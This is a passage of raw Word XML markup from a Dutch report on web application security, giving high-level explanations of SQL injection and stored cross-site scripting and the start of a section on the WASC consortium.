        <w:t>De SQL-</w:t>
      </w:r>
      <w:r w:rsidR="004C256F">
        <w:t>injectie</w:t>
      </w:r>
      <w:r w:rsidR="006B268D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004C256F">
        <w:t xml:space="preserve"> worden in</w:t>
      </w:r>
      <w:r w:rsidR="006B268D">
        <w:t xml:space="preserve"> de meeste gevallen via een web</w:t>
      </w:r>
      <w:r w:rsidR="004C256F">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00A90DDF">
        <w:t>mulier o</w:t>
      </w:r>
      <w:r w:rsidR="00C92265">
        <w:t xml:space="preserve">f browserbalk ingevoerd als </w:t>
      </w:r>
      <w:r w:rsidR="00A90DDF">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00C92265">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006B268D">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="004C256F">
        <w:t>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B0099F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FA1C97">
        <w:t xml:space="preserve"> dan kan de aanvaller zijn eigen SQL commando</w:t>
      </w:r>
      <w:r w:rsidR="00A17141">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00FA1C97">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00A17141">
        <w:t>eraan voegen wat de d</w:t>
      </w:r>
      <w:r w:rsidR="00FB6171">
        <w:t>atabase</w:t>
      </w:r>
      <w:r w:rsidR="00B0099F">
        <w:t xml:space="preserve"> op zijn beurt</w:t>
      </w:r>
      <w:r w:rsidR="00FB6171">
        <w:t xml:space="preserve"> zal uitvoeren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C21CB4" w14:textId="100A5E77" w:rsidR="0049510C" w:rsidRDefault="00241978" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16E360BA" wp14:editId="69E46744">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>436880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>213106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2A05E5" w:rsidRPr="003808D6" w:rsidRDefault="002A05E5"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6" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.4pt;margin-top:167.8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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1E47D233" w14:textId="3A137D16" w:rsidR="002A05E5" w:rsidRPr="003808D6" w:rsidRDefault="002A05E5" w:rsidP="00F664C7">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD3CD40" w14:textId="655D5D02" w:rsidR="0049510C" w:rsidRDefault="00241978" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08B93921" wp14:editId="0200292D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2406015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>18415</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2980055" cy="1140460"/>
                <wp:effectExtent l="0" t="0" r="0" b="254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140460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0ADFBF2C" w14:textId="4F6F20DC" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00271A19">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>SQL-injectie gebeurt wanneer de applicatie faalt om de ingevoerde data, via het formulier, schoon te maken van de SQL Query. Een aanvaller kan special opgebouwde SQL-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Tekstvak 2" o:spid="_x0000_s1047" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:189.45pt;margin-top:1.45pt;width:234.65pt;height:89.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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0ADFBF2C" w14:textId="4F6F20DC" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00271A19">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>SQL-injectie gebeurt wanneer de applicatie faalt om de ingevoerde data, via het formulier, schoon te maken van de SQL Query. Een aanvaller kan special opgebouwde SQL-commando’s gebruiken die de database op verzoek van de applicatie laat uitvoeren.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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49C5F45C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-71755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1143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7D349ACF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00271A19">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Met de SQL-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_x0000_s1048" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.65pt;margin-top:.9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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C10F22F" w14:textId="7D349ACF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00271A19">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Met de SQL-taal kan de applicatie met de database communiceren. Hiermee wordt er data opgevraagd, gewijzigd of verwijderd.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76025D" w14:textId="22876109" w:rsidR="0049510C" w:rsidRDefault="0049510C" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59459C20" w14:textId="0390749E" w:rsidR="0049510C" w:rsidRDefault="0049510C" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E835881" w14:textId="3BB25835" w:rsidR="0049510C" w:rsidRDefault="0049510C" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331BCFFE" w14:textId="77777777" w:rsidR="00241978" w:rsidRDefault="00241978" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3F7928" w14:textId="49BA4971" w:rsidR="003641BC" w:rsidRDefault="00C1656A" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="007F6D2C">
        <w:t xml:space="preserve">oorbeelden </w:t>
      </w:r>
      <w:r w:rsidR="009F70F3">
        <w:t>van een</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve"> SQL Injectie</w:t>
      </w:r>
      <w:r w:rsidR="00F87F60">
        <w:t xml:space="preserve"> in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318264F9" w14:textId="27A49909" w:rsidR="0049510C" w:rsidRDefault="00DD5376" w:rsidP="0049510C">
      <w:r>
        <w:t>Voor het uitvoeren van een</w:t>
      </w:r>
      <w:r w:rsidR="008F6A57">
        <w:t xml:space="preserve"> SQL-i</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve">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E81890">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C66E8F">
        <w:t>Voor meer informatie over SQL-</w:t>
      </w:r>
      <w:r w:rsidR="00660FD1">
        <w:t>injec</w:t>
      </w:r>
      <w:r w:rsidR="003A4FA9">
        <w:t>tie refereer ik u naar Bijlage</w:t>
      </w:r>
      <w:r w:rsidR="00660FD1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72687873" w14:textId="2CC48584" w:rsidR="0049510C" w:rsidRDefault="0049510C" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E17C887" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11749FAA" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421DEE36" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114862F7" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21094CF0" w14:textId="77777777" w:rsidR="004D5383" w:rsidRDefault="004D5383" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD9574B" w14:textId="6F25D942" w:rsidR="004D5383" w:rsidRDefault="00237769" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253345792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1460E2E5" wp14:editId="358C4758">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-596917</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13439836"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="36" name="Rectangle 36"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="13439836"/>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61FC6" id="Rectangle 36" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.75pt;margin-top:-46.95pt;width:25pt;height:1058.25pt;z-index:-2499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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E28FF" w14:textId="1F46833F" w:rsidR="005D1BBF" w:rsidRPr="008C7B6A" w:rsidRDefault="006A7123" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7B6A">
        <w:t>A3 XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596C95C" w14:textId="62306ED1"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34">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w:t>
      </w:r>
      <w:r w:rsidR="000E1B80">
        <w:t>s een client-side code injectie</w:t>
      </w:r>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t xml:space="preserve"> aanval waarin de aanvaller</w:t>
      </w:r>
      <w:r w:rsidR="000F0B88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00DC3E65">
        <w:t xml:space="preserve"> onstaat</w:t>
      </w:r>
      <w:r w:rsidR="005A7C7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F029D6">
        <w:t xml:space="preserve">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35">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51391CE3" w:rsidR="00A6274F" w:rsidRDefault="0049510C" w:rsidP="00A6274F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F6DD9" w14:textId="15BD5560" w:rsidR="0049510C" w:rsidRDefault="00AD5064" w:rsidP="000A19F4">
      <w:r>
        <w:t>Voor het verrichten van een XSS-</w:t>
      </w:r>
      <w:r w:rsidR="00CE7BDE">
        <w:t xml:space="preserve">aanval moet de aanvaller </w:t>
      </w:r>
      <w:r w:rsidR="00395AA9">
        <w:t>een stukje javascript code plaatsen op de content pag</w:t>
      </w:r>
      <w:r w:rsidR="00001C38">
        <w:t>ina van een webapplicatie die het</w:t>
      </w:r>
      <w:r w:rsidR="00395AA9">
        <w:t xml:space="preserve"> slachtoffer</w:t>
      </w:r>
      <w:r w:rsidR="00A56F49">
        <w:t xml:space="preserve"> vervolgens</w:t>
      </w:r>
      <w:r w:rsidR="00395AA9">
        <w:t xml:space="preserve"> bezoekt. </w:t>
      </w:r>
      <w:r w:rsidR="000E6447">
        <w:t>De aanvaller</w:t>
      </w:r>
      <w:r w:rsidR="003D7F9D">
        <w:t xml:space="preserve"> moet ervoor zorgen </w:t>
      </w:r>
      <w:r w:rsidR="00F623F1">
        <w:t xml:space="preserve">de webbrowser van </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="00F623F1">
        <w:t xml:space="preserve"> slachtoffer de javascript code runt. </w:t>
      </w:r>
      <w:r w:rsidR="00D53157">
        <w:t>De aanvaller</w:t>
      </w:r>
      <w:r w:rsidR="000E70C1">
        <w:t xml:space="preserve"> kan dat op twee manieren doen, door social enginering technieken te gebruiken om </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="000E70C1">
        <w:t xml:space="preserve"> slachtoffer te overtuigen om de geïnf</w:t>
      </w:r>
      <w:r w:rsidR="00D26E97">
        <w:t>ecteerde webpagina te bezoeken of door</w:t>
      </w:r>
      <w:r w:rsidR="001D4168">
        <w:t xml:space="preserve">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316BAE">
        <w:t xml:space="preserve"> De aanvaller</w:t>
      </w:r>
      <w:r w:rsidR="000C5262">
        <w:t xml:space="preserve"> hoeft allee</w:t>
      </w:r>
      <w:r w:rsidR="00E33555">
        <w:t xml:space="preserve">n nog maar te wachten totdat </w:t>
      </w:r>
      <w:r w:rsidR="000C5262">
        <w:t xml:space="preserve">niets vermoedende gebruikers de website bezoeken. </w:t>
      </w:r>
      <w:r w:rsidR="000A19F4">
        <w:t xml:space="preserve">In figuur 3.4 wordt een voorbeeld gegeven hoe een </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>HTML-script</w:t>
      </w:r>
      <w:r w:rsidR="000A19F4">
        <w:t xml:space="preserve"> wordt uitgeprint op een webpagina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5F6B2" w14:textId="2D26159E" w:rsidR="0049510C" w:rsidRDefault="000F5D03" w:rsidP="000A19F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7361C48B" wp14:editId="18585E55">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>627380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>411480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4250690" cy="282448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0690" cy="28244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5824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E666B54" wp14:editId="233AD5E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-9873</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>46903</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5554133" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="34290" b="35560"/>
                <wp:wrapNone/>
                <wp:docPr id="450" name="Rechthoek 450"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5554133" cy="34544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2A05E5" w:rsidRPr="00500E88" w:rsidRDefault="002A05E5"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9" style="position:absolute;left:0;text-align:left;margin-left:-.8pt;margin-top:3.7pt;width:437.35pt;height:27.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" fillcolor="#f2f2f2 [3052]" strokecolor="black [3200]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="438B81CB" w14:textId="7A35B497" w:rsidR="002A05E5" w:rsidRPr="00500E88" w:rsidRDefault="002A05E5" w:rsidP="00500E88">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00500E88">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Cross-site scripting</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0049510C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252114944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A5B84BE" wp14:editId="291818BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>624205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2975610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="26987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318635" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="21E49B16" w14:textId="454B105A" w:rsidR="002A05E5" w:rsidRPr="00CF1B56" w:rsidRDefault="002A05E5" w:rsidP="0049510C">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>figu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84BE" id="Text Box 24" o:spid="_x0000_s1050" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:49.15pt;margin-top:234.3pt;width:340.05pt;height:21.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AjmTgCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EaMtY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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="21E49B16" w14:textId="454B105A" w:rsidR="002A05E5" w:rsidRPr="00CF1B56" w:rsidRDefault="002A05E5" w:rsidP="0049510C">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>figuur 3.4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403FAFC" w14:textId="181CDE90" w:rsidR="00E57EB8" w:rsidRDefault="0049510C" w:rsidP="00974BBE">
      <w:r>
        <w:t>In figuur 3.4</w:t>
      </w:r>
      <w:r w:rsidR="00B47C4E">
        <w:t xml:space="preserve"> wordt de uitvoering van een simpele maar effectieve </w:t>
      </w:r>
      <w:r w:rsidR="00F63B54">
        <w:t>XSS-aanval</w:t>
      </w:r>
      <w:r w:rsidR="00B47C4E">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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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039AB34B" w:rsidR="00B46A55" w:rsidRDefault="00B46A55" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De server verwerkt de reactie en slaat het op in de database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECF07D" w14:textId="68ADCC36" w:rsidR="00B46A55" w:rsidRDefault="005265E2" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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303ED145" w:rsidR="00FB7A50" w:rsidRDefault="00FB7A50" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser doet een aanvraag voor de webpagina op verzoek van de gebruiker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B948951" w14:textId="0DE876D8" w:rsidR="00FB7A50" w:rsidRDefault="00FB7A50" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De server geeft de webpagina met alle reactie plus de reactie van de hacker terug aan de webbrowser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2EFD7" w14:textId="107A424E" w:rsidR="00FB7A50" w:rsidRDefault="003C09BD" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser runt de javascript code die het op de webpagina heeft gevonden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF044B" w14:textId="638625D8" w:rsidR="008C70DE" w:rsidRDefault="00F57C43" w:rsidP="008C70DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser stuurt de data van de niets vermoedende gebruiker naar de hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE0ED1" w14:textId="040F3544" w:rsidR="008C0FFD" w:rsidRPr="008E50BA" w:rsidRDefault="008C0FFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B43ECA" w14:textId="46EFACD9" w:rsidR="0089139C" w:rsidRPr="00273C52" w:rsidRDefault="00394B19" w:rsidP="00FA5D91">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252146688" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A85E580" wp14:editId="63CF381B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3297616</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13439836"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="464" name="Rectangle 464"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="317500" cy="13439836"/>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8D899" id="Rectangle 464" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-259.6pt;width:25pt;height:1058.25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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA5D91">
        <w:t xml:space="preserve">3.2.3 </w:t>
      </w:r>
      <w:r w:rsidR="0089139C" w:rsidRPr="00273C52">
        <w:t>WASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AC08EC" w14:textId="5708EDBB" w:rsidR="004B55A6" w:rsidRPr="00F12D3B" w:rsidRDefault="007C1416" w:rsidP="00C41D9B">
      <w:r w:rsidRPr="00F12D3B">
        <w:t>De Web Application Security</w:t>
      </w:r>
      <w:r w:rsidR="00F12D3B" w:rsidRPr="00F12D3B">
        <w:t xml:space="preserve"> Consortium </w:t>
      </w:r>
      <w:r w:rsidR="00F12D3B">
        <w:t>heeft als hoofddoel om sta</w:t>
      </w:r>
      <w:r w:rsidR="00EB53D5">
        <w:t>ndaarden te produceren voor web</w:t>
      </w:r>
      <w:r w:rsidR="00F12D3B">
        <w:t xml:space="preserve">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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B55A6" w14:paraId="34258A2D"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9ABF010" w14:textId="77777777" w:rsidR="004B55A6" w:rsidRDefault="004B55A6" w:rsidP="008E50BA">
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B55A6" w:rsidRPr="00F12D3B" w14:paraId="044EC9A5"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4B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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2DB23D6B" w:rsidR="00DD7292" w:rsidRPr="00A46B43" w:rsidRDefault="00294937" w:rsidP="00C41D9B">
